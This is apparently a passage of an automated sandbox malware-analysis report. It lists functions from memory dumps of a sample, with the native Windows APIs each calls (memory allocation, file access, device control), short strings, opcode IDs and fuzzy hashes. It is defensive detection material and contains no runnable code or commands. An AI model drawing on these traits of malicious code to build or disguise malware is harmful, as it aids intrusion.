                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID: Iy2
                                            • API String ID: 2706961497-1648239622
                                            • Opcode ID: ba61fff2c2f8ecbcb90dd0efb0b76632cbe112494802080adf82a2a7be10b30e
                                            • Instruction ID: 47f49655080b461e722351ec79303e58232d0ec524e84f8d882077895ac7d934
                                            • Opcode Fuzzy Hash: ba61fff2c2f8ecbcb90dd0efb0b76632cbe112494802080adf82a2a7be10b30e
                                            • Instruction Fuzzy Hash: A821E3B5D013499FCB10DFAAD984ADEFBF5FF48310F64842AE519A7240C779A901CBA1
                                            Function 04D3473B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 04D347C9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: FileOpen
                                            • String ID: Iy2
                                            • API String ID: 2669468079-1648239622
                                            • Opcode ID: 620c1763eebb6a12884f53b0faec9553838031ee4ad8a378d43bee60930d558b
                                            • Instruction ID: 1c431beaad94e76fddd1859b0e1ed94dcfa3827d166d57c63da674ddba0a55d3
                                            • Opcode Fuzzy Hash: 620c1763eebb6a12884f53b0faec9553838031ee4ad8a378d43bee60930d558b
                                            • Instruction Fuzzy Hash: C92114B5D01209AFCB00CFAAD984ADEFBB5FF08310F10852AE518B7240C7799A15CBA1
                                            Function 04D34B78 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 04D34BFE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: ControlDeviceFile
                                            • String ID: Iy2
                                            • API String ID: 3512290074-1648239622
                                            • Opcode ID: d8af989a3894c8d76b40f6d566f31f2372b0a12bb654f41270dd0052270ab755
                                            • Instruction ID: f0515aed415aedd027e9b5414990af50b31c0adcce9942d9d604e5078e1d419b
                                            • Opcode Fuzzy Hash: d8af989a3894c8d76b40f6d566f31f2372b0a12bb654f41270dd0052270ab755
                                            • Instruction Fuzzy Hash: F52123768002099FCF11CFAAD884ADFBBF5FF48324F14841AE919A7210C779A951CFA0
                                            Function 04D343F8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 04D3447B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID: Iy2
                                            • API String ID: 2167126740-1648239622
                                            • Opcode ID: e7a21a65836a29fa1eb9913b1a3378eab2098adba45eb6eea9527a1e0c31e5ea
                                            • Instruction ID: 4b89a74d2cab2110d71ba4241da7868fb72d5c6e8fc42bb3f862bc4467bebfe4
                                            • Opcode Fuzzy Hash: e7a21a65836a29fa1eb9913b1a3378eab2098adba45eb6eea9527a1e0c31e5ea
                                            • Instruction Fuzzy Hash: 232123B5D003099FCF10CFAAD884ADEFBF5BF48314F50842AE919A7200C778A940CBA0
                                            Function 04D34AA9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 04D34B27
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: FileInformationQueryVolume
                                            • String ID: Iy2
                                            • API String ID: 634242254-1648239622
                                            • Opcode ID: caa8000e70f027bc70e2b0ca7fa865623e4845a39b3154474be0551b1b052e2b
                                            • Instruction ID: 226f57ade501fa05503137af53edbcbb7366bb4edbe63b62b51065947f39f36b
                                            • Opcode Fuzzy Hash: caa8000e70f027bc70e2b0ca7fa865623e4845a39b3154474be0551b1b052e2b
                                            • Instruction Fuzzy Hash: 26213575D002499FCB10CFAAD884AEEFBF5BF58320F14842AE419A7200C7799901CFA0
                                            Function 04D343F3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 04D3447B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID: Iy2
                                            • API String ID: 2167126740-1648239622
                                            • Opcode ID: b4fe1f05f55aa8b6a484e2ed54bbde79c9429dd9cc614790494ba993047c3b74
                                            • Instruction ID: 0a42f5a8267359c33a1f090e74cd3a7ed6c978e5759d89bc3a99c26eccdc6e72
                                            • Opcode Fuzzy Hash: b4fe1f05f55aa8b6a484e2ed54bbde79c9429dd9cc614790494ba993047c3b74
                                            • Instruction Fuzzy Hash: BB2112B59003499FCF10CFAAD8806DEBBF5BF48314F50842AE559A7210C7799955CBA0
                                            Function 04D34AB0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 04D34B27
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: FileInformationQueryVolume
                                            • String ID: Iy2
                                            • API String ID: 634242254-1648239622
                                            • Opcode ID: 838b62a6d75bef58ca8a52928851985914a4f30655e4f661cda72bc365f6af3c
                                            • Instruction ID: 7b1866642d5125ab21ce9530680c28be4a17b48de2471d9f9c53b1d8bf44a8a9
                                            • Opcode Fuzzy Hash: 838b62a6d75bef58ca8a52928851985914a4f30655e4f661cda72bc365f6af3c
                                            • Instruction Fuzzy Hash: 3D2113759002499FDB10DFAAD884ADEFBF5BF58320F14842AD419A7240C778A900CFA1
                                            Function 04D33E63 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: Close
                                            • String ID: Iy2
                                            • API String ID: 3535843008-1648239622
                                            • Opcode ID: fea0d206e9588c4da152fa2836deee02fc9bc75bb807ad20737e9027da05f441
                                            • Instruction ID: ce8e543e5a8794096bd5a8e51e574fa8b015834beca70bef5138cef32395775b
                                            • Opcode Fuzzy Hash: fea0d206e9588c4da152fa2836deee02fc9bc75bb807ad20737e9027da05f441
                                            • Instruction Fuzzy Hash: 231155B1C003498FDB20DFAAC5457EEBFF5AF88320F24881AC419B7240C639A941CBA4
                                            Function 04D33E68 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: Close
                                            • String ID: Iy2
                                            • API String ID: 3535843008-1648239622
                                            • Opcode ID: 4c8f7c73e4d1f47e8db2fb2fce5d379786e6e34e47a0e13f2b6ae6725653da2e
                                            • Instruction ID: d48888fc2dd489dcdf177a8d5e9dd20cbc657fe675a906b45eea7e86149eedb5
                                            • Opcode Fuzzy Hash: 4c8f7c73e4d1f47e8db2fb2fce5d379786e6e34e47a0e13f2b6ae6725653da2e
                                            • Instruction Fuzzy Hash: A41128759003498FDB10DFAAC5457DFFBF5AF88324F248819C419B7240C679A945CBA4
                                            Function 082A7AE0 Relevance: 3.4, Strings: 1, Instructions: 2124COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509230686.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_82a0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $w8W
                                            • API String ID: 0-3174752524
                                            • Opcode ID: c704cfa6b39446d7a723bc6d68526273bacf1ba340782620c2d7efca251af50c
                                            • Instruction ID: cd68501bdbe29e13630888da61142a8f3112a28c3f57b8de57c114f2d9e293d8
                                            • Opcode Fuzzy Hash: c704cfa6b39446d7a723bc6d68526273bacf1ba340782620c2d7efca251af50c
                                            • Instruction Fuzzy Hash: 0CF29076E106298FCB18CEA8C88059EB7F6BF88310B5A856AD819FB355D774DC45CBC0
                                            Function 085E2458 Relevance: 3.3, Strings: 1, Instructions: 2089COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509673377.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_85e0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: d
                                            • API String ID: 0-2564639436
                                            • Opcode ID: 533bb52d12a1fb85a5a0089a085d61384f53864d43cb8d01d80daddaca7d6e87
                                            • Instruction ID: 7a301f895ddc4d0a882ab8a4b0f9a749f688e9efb19824f885036e283f787ee5
                                            • Opcode Fuzzy Hash: 533bb52d12a1fb85a5a0089a085d61384f53864d43cb8d01d80daddaca7d6e87
                                            • Instruction Fuzzy Hash: 7B132075E006298FDB64CF58C984A99F7F2BF88310F1586AAE809EB355D7709D85CF80
                                            Function 082A9758 Relevance: 3.3, Strings: 2, Instructions: 798COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509230686.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_82a0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: +#@$:86
                                            • API String ID: 0-802956954
                                            • Opcode ID: f2b84d0db1d624ce107dd198d6d549c4151806714d79b1cbe5fffafa9a3b04a8
                                            • Instruction ID: 957dfa1c5b9045f8288900dad34b0b69fe4a189555b214112be0dbfd30e0eb91
                                            • Opcode Fuzzy Hash: f2b84d0db1d624ce107dd198d6d549c4151806714d79b1cbe5fffafa9a3b04a8
                                            • Instruction Fuzzy Hash: 8152D473E1053A8BDB14CF69C88059ABBE6BF8431074A866ADC19FB341E7749D55CBC0
                                            Function 05DF1A10 Relevance: 3.2, Strings: 2, Instructions: 650COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: [?N[$$}q
                                            • API String ID: 0-2487488587
                                            • Opcode ID: 20156c56b63ed0ba38cbfbc34d773c8b44ab874108da824d643f09a8fd3d4cbc
                                            • Instruction ID: 720c35aa07bac29cfce26be01df9c9738487841cf8acd484f89ea28eee9a9792
                                            • Opcode Fuzzy Hash: 20156c56b63ed0ba38cbfbc34d773c8b44ab874108da824d643f09a8fd3d4cbc
                                            • Instruction Fuzzy Hash: E9328076F106259FC714DFA9D88099DB7F2BF8831071A856AE90AEB355DA70DC02CBC0
                                            Function 04D3CDFB Relevance: 3.1, Strings: 2, Instructions: 610COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -,G$0V16
                                            • API String ID: 0-2930258375
                                            • Opcode ID: c6381e4a02a21bfc0db65010548824734c8d7985dc70d1f4b568e91f02352469
                                            • Instruction ID: ada54410f3aaf36f30af4d70a8eb0f2c1dcd48a8205db73b6c661c896bb8033e
                                            • Opcode Fuzzy Hash: c6381e4a02a21bfc0db65010548824734c8d7985dc70d1f4b568e91f02352469
                                            • Instruction Fuzzy Hash: DC523874A00209DFDB58DFA4D9956ADBBB2FF89305F2084ADD506A7390DB35AE81CF01
                                            Function 04D3CE00 Relevance: 3.1, Strings: 2, Instructions: 608COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -,G$0V16
                                            • API String ID: 0-2930258375
                                            • Opcode ID: dbe686eb3cc299038de53709ff5e7c27fe50064e369f221d8aa1077748a2accc
                                            • Instruction ID: 0456f82add93708a0d3148a958e7713c775fd799084301ba24ddad173e261c09
                                            • Opcode Fuzzy Hash: dbe686eb3cc299038de53709ff5e7c27fe50064e369f221d8aa1077748a2accc
                                            • Instruction Fuzzy Hash: D7523874A00209DFDB58DFA4D9956ADBBB2FF89305F2084ADD506A7390DB35AE81CF01
                                            Function 085E45F0 Relevance: 3.1, Strings: 2, Instructions: 574COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509673377.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_85e0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: +x=I$2s3_
                                            • API String ID: 0-1334860657
                                            • Opcode ID: 5bb236e1ff8b264ece33bbd1ed3f66ea67dd1be93695e3b30b95cab58de78ac4
                                            • Instruction ID: 5367d4f3e3cc4dcd99f42fa7487d95b8806cbca0111c27771ab15ec7b6afd2e9
                                            • Opcode Fuzzy Hash: 5bb236e1ff8b264ece33bbd1ed3f66ea67dd1be93695e3b30b95cab58de78ac4
                                            • Instruction Fuzzy Hash: 43222732F142648FCB18CF68DC54699FBB2BF85210F4A85EAD849EB352DA349C05CBD1
                                            Function 05DFAFD8 Relevance: 2.8, Strings: 2, Instructions: 286COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 3$$cZl^
                                            • API String ID: 0-3051308067
                                            • Opcode ID: d709ec02b94b7ab59618f758dacf4faf7fde192ea01230a93aa8144c0b2cc33b
                                            • Instruction ID: 4c65f9bc47465bfa2c31360e03dada9ecc3af220d22906cae28597a7c8ab7144
                                            • Opcode Fuzzy Hash: d709ec02b94b7ab59618f758dacf4faf7fde192ea01230a93aa8144c0b2cc33b
                                            • Instruction Fuzzy Hash: A3B19F76F015199FDB04DFA9D9909ADB7F2FF88310B16816AE819EB304DB74AD05CB80
                                            Function 085E616F Relevance: 2.8, Strings: 2, Instructions: 254COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509673377.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_85e0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #l7G$;f=2
                                            • API String ID: 0-1487333116
                                            • Opcode ID: 847d2243d0424fda0d22fd96df7749ff002f997113039bd22c3b5fbbe06f90a1
                                            • Instruction ID: 55f3d18cef70f3388df10164db4a0de8d0b8fe2f5dc1031b530bb25aceacc005
                                            • Opcode Fuzzy Hash: 847d2243d0424fda0d22fd96df7749ff002f997113039bd22c3b5fbbe06f90a1
                                            • Instruction Fuzzy Hash: 9E81D279B006548FC715CF69D9C4999FBF2BF9821071AC2AAD809DB356D731EC42CB80
                                            Function 085E8348 Relevance: 2.4, Strings: 1, Instructions: 1144COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509673377.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_85e0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: j8c
                                            • API String ID: 0-3365797271
                                            • Opcode ID: 93dc100e6162181bd2a6c24e07210062e52c8069a4d8f121e7394d0ddfbbf6b6
                                            • Instruction ID: 95e3bb1f17513e22f5776edb31d0f6a689a6275d54a884ad6fdd4f35d2fdea21
                                            • Opcode Fuzzy Hash: 93dc100e6162181bd2a6c24e07210062e52c8069a4d8f121e7394d0ddfbbf6b6
                                            • Instruction Fuzzy Hash: D792D376E106248FCB18DF69C89059DBBE2BF88310B1985AAEC45EB355DA34DD06CBC0
                                            Function 05DFB560 Relevance: 2.3, Strings: 1, Instructions: 1015COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ?)(g
                                            • API String ID: 0-807080149
                                            • Opcode ID: aacf7bbb326d45c5bb47ccf2d3d27c592198276d760ab2a421a1fba6064434ed
                                            • Instruction ID: 627dbbb39141757da674ff2dbf91da2d86c3846ad365a4746fdcd3dfedee2d02
                                            • Opcode Fuzzy Hash: aacf7bbb326d45c5bb47ccf2d3d27c592198276d760ab2a421a1fba6064434ed
                                            • Instruction Fuzzy Hash: 06828471F001298BD768DF69C890AAEB7E7AF98300F0585AED80EE7344DA749D458FD0
                                            Function 05DF0E78 Relevance: 2.2, Strings: 1, Instructions: 913COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: +C
                                            • API String ID: 0-2106882527
                                            • Opcode ID: 7c63f21d3370204fb260400f3834595f54abe651e8fc034e9be2051a4a9b063c
                                            • Instruction ID: a2e5cb56c7444374297a4662a02ca29fe58aeeea2146d49951e3105024a4ff1e
                                            • Opcode Fuzzy Hash: 7c63f21d3370204fb260400f3834595f54abe651e8fc034e9be2051a4a9b063c
                                            • Instruction Fuzzy Hash: 2462B572F002248FD754DFA8CC90AAEB7A7AF94310F1585AED90AE7345DA34AD05CBD1
                                            Function 085EF4D8 Relevance: 2.1, Strings: 1, Instructions: 894COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509673377.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_85e0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 5_7@
                                            • API String ID: 0-1737121702
                                            • Opcode ID: 51068e628e62f8b1a594b6eaa403d117756d395e32ad5bb587f6912dea4c2cc6
                                            • Instruction ID: 1b0b580c0906b50c4fcacd478a3485e2f4aaf3107d293d60e832d1936edbd365
                                            • Opcode Fuzzy Hash: 51068e628e62f8b1a594b6eaa403d117756d395e32ad5bb587f6912dea4c2cc6
                                            • Instruction Fuzzy Hash: 2E42E672F006299FDB18CF68C88059EB7B2BB88310B5585AAEC55EB341DB71EC55CBD0
                                            Function 08250D28 Relevance: 2.0, Strings: 1, Instructions: 775COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509033258.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8250000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH}q
                                            • API String ID: 0-693324503
                                            • Opcode ID: 5200d31ced79c409da473af6271cf0b0dfd57309329cff8694999054b2a81d66
                                            • Instruction ID: 98a6e3f9e9feda2124435006be8cfa3805544c9581286d99157ad0d7e709ed13
                                            • Opcode Fuzzy Hash: 5200d31ced79c409da473af6271cf0b0dfd57309329cff8694999054b2a81d66
                                            • Instruction Fuzzy Hash: D6626C35F105248FC724DF68C994B59B7B2BB88310F1A85AAD809EB355DB35ED92CF80
                                            Function 08259C68 Relevance: 1.9, Instructions: 1865COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509033258.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8250000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e4cb25b269bc4e90e6e7455e69dd45bd7f540b7c84ecb3f9c2d6778244b5dd0
                                            • Instruction ID: b944849b62aff18d9d1f58ee335ead187ba323418b881a758b24d8e5cf819b2a
                                            • Opcode Fuzzy Hash: 6e4cb25b269bc4e90e6e7455e69dd45bd7f540b7c84ecb3f9c2d6778244b5dd0
                                            • Instruction Fuzzy Hash: 34F2C572E502298FCB64DF68C894699BBB2AF84314F5585AADC49E7341DB31DD81CFC0
                                            Function 082A5E68 Relevance: 1.8, Strings: 1, Instructions: 553COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509230686.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_82a0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: y?1
                                            • API String ID: 0-484001441
                                            • Opcode ID: 10c6d56d5713920484b1f557cc6a5f7ddcfe5de05ae1927052911f2a68f482a6
                                            • Instruction ID: 66512ea8b7606fdae561470ac6434500e79bdd4f1fd043d946c397a523d11aae
                                            • Opcode Fuzzy Hash: 10c6d56d5713920484b1f557cc6a5f7ddcfe5de05ae1927052911f2a68f482a6
                                            • Instruction Fuzzy Hash: 7912B176F112258FC714DF68C98059EFBE2AF88310B1A85AAD809EB351D775DC46CBD0
                                            Function 085E520B Relevance: 1.8, Strings: 1, Instructions: 510COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509673377.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_85e0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2s3_
                                            • API String ID: 0-577638506
                                            • Opcode ID: a4d423bc422994de864d2e15f041f4145320f392061aaaf0447cd16c85d1aa08
                                            • Instruction ID: 4aff3e330286104bd423a62deacfd7424b783e31ce889f476856e70740cd5c5f
                                            • Opcode Fuzzy Hash: a4d423bc422994de864d2e15f041f4145320f392061aaaf0447cd16c85d1aa08
                                            • Instruction Fuzzy Hash: 83129376F102788FDB18CF68D884699BBF2BB84314F5A85A9D849EB341DA709D45CFC0
                                            Function 0825B910 Relevance: 1.8, Strings: 1, Instructions: 509COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509033258.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8250000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: =$m
                                            • API String ID: 0-3923651090
                                            • Opcode ID: 683a23e9f9083757c6732095660d6c861b8bf6c5e282f764272b5e0b75a3dc59
                                            • Instruction ID: 2606e21b5be3c00e29e9ed7ac9683db82a8b722383528447823cc3c457874a38
                                            • Opcode Fuzzy Hash: 683a23e9f9083757c6732095660d6c861b8bf6c5e282f764272b5e0b75a3dc59
                                            • Instruction Fuzzy Hash: 9012CC35B002058FC714CFA8D9D4999FBA7AF88310B1AC5A9D909DB356DB76EC47CB80
                                            Function 0825BA30 Relevance: 1.7, Strings: 1, Instructions: 450COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509033258.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8250000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: =$m
                                            • API String ID: 0-3923651090
                                            • Opcode ID: 2bf63c6f9657e8b9bdfc5f88c8830bf4612730a239df12d16606f4288e341ff8
                                            • Instruction ID: c0e6e8a5f662ddf314475b9e222cfb142c8b59196da44d62cf4cf173dcc2a816
                                            • Opcode Fuzzy Hash: 2bf63c6f9657e8b9bdfc5f88c8830bf4612730a239df12d16606f4288e341ff8
                                            • Instruction Fuzzy Hash: F3F1BA35B402058FCB14CFA8C9D0999FBA7BF88310B59C669D909EB345DB76EC46CB80
                                            Function 085E5ED5 Relevance: 1.7, Strings: 1, Instructions: 444COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509673377.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_85e0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #l7G
                                            • API String ID: 0-2863765903
                                            • Opcode ID: 45b98c81981572afa755826c78a5c7c77532fc3a33b00173e89ca873fe8e38f5
                                            • Instruction ID: c90a1ff655bc0b79ecfa8fef0b42a72dc8be38bb7f421b9e402841bf31a6e7e0
                                            • Opcode Fuzzy Hash: 45b98c81981572afa755826c78a5c7c77532fc3a33b00173e89ca873fe8e38f5
                                            • Instruction Fuzzy Hash: 82E1BD75B006158FCB18CFA8D8C059DFBE2BF98255B19856AE409EB346DB71EC46CB80
                                            Function 085E5D50 Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509673377.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_85e0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #l7G
                                            • API String ID: 0-2863765903
                                            • Opcode ID: de9147effbf5fa80577b0fb8aa35323c2dce736887221b3fe7a42a4e58c817a3
                                            • Instruction ID: b070a2b61f70879d8c456c90f34bb69a46bde741254eca8c70ff0b4361817d0b
                                            • Opcode Fuzzy Hash: de9147effbf5fa80577b0fb8aa35323c2dce736887221b3fe7a42a4e58c817a3
                                            • Instruction Fuzzy Hash: 2EE1CF75B006158FCB19CFA8D8C059DFBF2BF982517198669E809EB346DB71EC46CB80
                                            Function 085E5C19 Relevance: 1.7, Strings: 1, Instructions: 415COMMON
                                            Download Yara Rule
